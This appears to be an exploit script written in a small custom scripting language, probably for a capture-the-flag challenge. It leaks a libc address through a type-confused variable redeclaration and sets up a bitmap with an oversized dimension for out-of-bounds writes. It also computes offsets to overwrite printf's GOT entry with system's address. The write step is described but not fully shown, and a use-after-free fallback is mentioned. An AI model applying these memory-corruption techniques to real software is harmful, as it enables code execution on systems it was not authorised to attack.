print("=== Try Direct GOT Write ===");

print("Step 1: Leak libc");
string v2 = "BBBBBBBB";
int v2 = 4231312;
int leaked = length(v2);
print("Leaked:");
print(leaked);

print("Step 2: system_addr = 137050643072848 (calculated)");
print("printf@GOT = 0x409048");

print("Step 3: Create bitmap");
bitmap b1 = create(9223372036854775807, 2);

print("Step 4: Try writing to GOT directly");
print("Assumption: bitmap_data_ptr might be near binary base");
print("Try: bitmap_data_ptr = 0x400000");

int gotaddr = 4202568;
int bitmapptr = 4194304;
int offset = gotaddr - bitmapptr;
int bitindex = offset * 8;
print("offset:");
print(offset);
print("bit_index:");
print(bitindex);

print("Writing system_addr (0x7ca596e58750) to printf@GOT");
print("This requires 64 set() calls");
print("Generated by Python helper");

print("Note: If this doesn't work, bitmap buffer is elsewhere");
print("Will need to find it or use use-after-free");

